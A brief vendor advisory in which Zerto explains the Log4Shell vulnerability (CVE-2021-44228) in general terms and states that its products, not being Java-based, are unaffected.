On December 11, 2021, Zerto, a Hewlett Packard Enterprise company, was made aware of a security event impacting Apache Software Log4j v2.x associated with CVE-2021-44228, also known as Log4Shell or LogJam).
What is Log4j?
Log4j is an open-source Java logging library that is widely used in a range of software applications and services around the world. The vulnerability can allow threat actors the opportunity to take control of any Java-based, internet-facing server and engage in Remote Code Execution (RCE) attacks.
Log4j was found to be vulnerable to a format string code execution bug that was not disclosed and patched in a coordinated manner. This bug utilizes JNDI capabilities that enable attackers to carry out a Remote Code Execution (RCE).
The bug (CVE-2021-44228 aka as Log4Shell) causes the vulnerable component to actively connect to the internet, fetch the malicious code, and run it.
Did Log4j Impact the Zerto Product?
We have completed the analysis of all Zerto products and have confirmed that none of them are vulnerable to the Log4Shell exploit. Specifically, Zerto components installed on customer environments are not implemented in Java, and therefore are not susceptible.
This is applicable for all versions of Zerto.
Please visit https://help.zerto.com/kb/000004822 for Zerto's official response.